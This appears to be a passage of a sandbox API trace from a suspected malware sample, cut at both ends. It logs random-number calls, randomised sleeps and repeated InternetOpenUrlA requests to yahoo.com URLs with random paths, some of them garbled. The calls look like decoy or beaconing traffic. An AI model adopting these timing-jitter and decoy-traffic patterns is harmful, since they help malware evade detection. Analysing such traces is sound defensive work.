dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.334] GetProcessHeap () returned 0x440000 [0244.334] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0244.334] lstrcpyA (in: lpString1=0x472f30, lpString2="\x83\x8f»·s://www.yahoo.com" | out: lpString1="\x83\x8f»·s://www.yahoo.com") returned="\x83\x8f»·s://www.yahoo.com" [0244.334] lstrcatA (in: lpString1="\x83\x8f»·s://www.yahoo.com", lpString2="/Pqxqjbgjic640pn3hZx/" | out: lpString1="\x83\x8f»·s://www.yahoo.com/Pqxqjbgjic640pn3hZx/") returned="\x83\x8f»·s://www.yahoo.com/Pqxqjbgjic640pn3hZx/" [0244.334] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0244.334] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x83\x8f»·s://www.yahoo.com/Pqxqjbgjic640pn3hZx/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0244.334] GetProcessHeap () returned 0x440000 [0244.334] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0244.334] GetProcessHeap () returned 0x440000 [0244.334] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5870 | out: hHeap=0x440000) returned 1 [0244.334] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0244.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0244.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0244.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0244.335] Sleep (dwMilliseconds=0x1bed5) [0244.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0244.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0244.538] GetProcessHeap () returned 0x440000 [0244.538] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f54f0 [0244.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0244.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f54f1, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x4f54f1) returned 0x0 [0244.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.545] GetProcessHeap () returned 0x440000 [0244.545] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0244.545] lstrcpyA (in: lpString1=0x473560, lpString2="\x86/t\rs://www.yahoo.com" | out: lpString1="\x86/t\rs://www.yahoo.com") returned="\x86/t\rs://www.yahoo.com" [0244.545] lstrcatA (in: lpString1="\x86/t\rs://www.yahoo.com", lpString2="/9toSkdwo8jmzrHffpfliFojdAa9Xc/" | out: lpString1="\x86/t\rs://www.yahoo.com/9toSkdwo8jmzrHffpfliFojdAa9Xc/") returned="\x86/t\rs://www.yahoo.com/9toSkdwo8jmzrHffpfliFojdAa9Xc/" [0244.545] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0244.545] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x86/t\rs://www.yahoo.com/9toSkdwo8jmzrHffpfliFojdAa9Xc/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0244.545] GetProcessHeap () returned 0x440000 [0244.546] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0244.546] GetProcessHeap () returned 0x440000 [0244.546] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f54f0 | out: hHeap=0x440000) returned 1 [0244.546] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0244.546] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0244.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0244.546] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0244.547] Sleep (dwMilliseconds=0x1a76d) [0244.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0244.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0244.697] GetProcessHeap () returned 0x440000 [0244.697] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f50f0 [0244.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0244.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f50f1, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4f50f1) returned 0x0 [0244.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.853] GetProcessHeap () returned 0x440000 [0244.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0244.854] lstrcpyA (in: lpString1=0x472f30, lpString2="ðPO" | out: lpString1="ðPO") returned="ðPO" [0244.854] lstrcatA (in: lpString1="ðPO", lpString2="/fsQmz3uwqinx0rhyofn9v5U3z2wwj3ix0d8vpwtsy2b4o99/" | out: lpString1="ðPO/fsQmz3uwqinx0rhyofn9v5U3z2wwj3ix0d8vpwtsy2b4o99/") returned="ðPO/fsQmz3uwqinx0rhyofn9v5U3z2wwj3ix0d8vpwtsy2b4o99/" [0244.854] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0244.854] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ðPO/fsQmz3uwqinx0rhyofn9v5U3z2wwj3ix0d8vpwtsy2b4o99/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0244.854] GetProcessHeap () returned 0x440000 [0244.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0244.854] GetProcessHeap () returned 0x440000 [0244.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f50f0 | out: hHeap=0x440000) returned 1 [0244.854] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0244.855] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0244.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0244.855] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0244.855] Sleep (dwMilliseconds=0x1c1c2) [0245.008] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0245.008] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.008] GetProcessHeap () returned 0x440000 [0245.008] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0245.009] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.009] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0245.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.010] 